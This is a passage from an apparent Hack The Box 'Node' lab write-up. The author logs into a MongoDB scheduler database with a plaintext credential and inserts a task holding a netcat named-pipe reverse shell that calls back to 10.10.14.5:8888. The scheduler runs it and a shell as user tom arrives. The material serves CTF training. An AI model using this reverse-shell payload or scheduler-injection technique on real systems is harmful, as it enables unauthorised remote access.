tom
mark@node:/var/scheduler$ mongo -u mark -p 5AYRft73VtFpc84k scheduler
mongodb shell version: 3.2.16
connecting to: scheduler
> show collections
tasks
> db.tasks.find()I first connected to the scheduler DB with the credential, and checked out the existing tasks collection.
The task collection is empty.
> db.tasks.insertone({ cmd: "mkfifo /tmp/dvxv; nc 10.10.14.5 8888 0</tmp/dvxv | /bin/sh >/tmp/dvxv 2>&1; rm /tmp/dvxv" });
{
"acknowledged" : true,
"insertedid" : ObjectId("63c8a002d7a7ce3188291e33")
}i used the db.collection.insertone() method to create a new document with a field, “cmd”, containing the payload
> db.tasks.find()
{ "_id" : ObjectId("63c8a002d7a7ce3188291e33"), "cmd" : "mkfifo /tmp/dvxv; nc 10.10.14.5 8888 0</tmp/dvxv | /bin/sh >/tmp/dvxv 2>&1; rm /tmp/dvxv" }i can confirm that with db.collection.find() to check out the task collection.
As can be seen, the task collection is now populated with the document that I inserted
This should get executed in less than 30 seconds
┌──(kali㉿kali)-[~/archive/htb/labs/node]
└─$ nnc 8888
listening on [any] 8888 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.58] 41832
whoami
tom
hostname
node
ifconfig
ens33 link encap:Ethernet HWaddr 00:50:56:b9:1b:9d
inet addr:10.10.10.58 Bcast:10.10.10.255 Mask:255.255.255.0
inet6 addr: fe80::250:56ff:feb9:1b9d/64 Scope:Link
up broadcast running multicast mtu:1500 Metric:1
rx packets:649792 errors:0 dropped:116 overruns:0 frame:0
tx packets:1056241 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
rx bytes:81752813 (81.7 MB) TX bytes:1524701811 (1.5 GB)
lo link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
up loopback running mtu:65536 Metric:1
rx packets:168340 errors:0 dropped:0 overruns:0 frame:0
tx packets:168340 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
rx bytes:13834119 (13.8 MB) TX bytes:13834119 (13.8 MB)As expected, a shell came through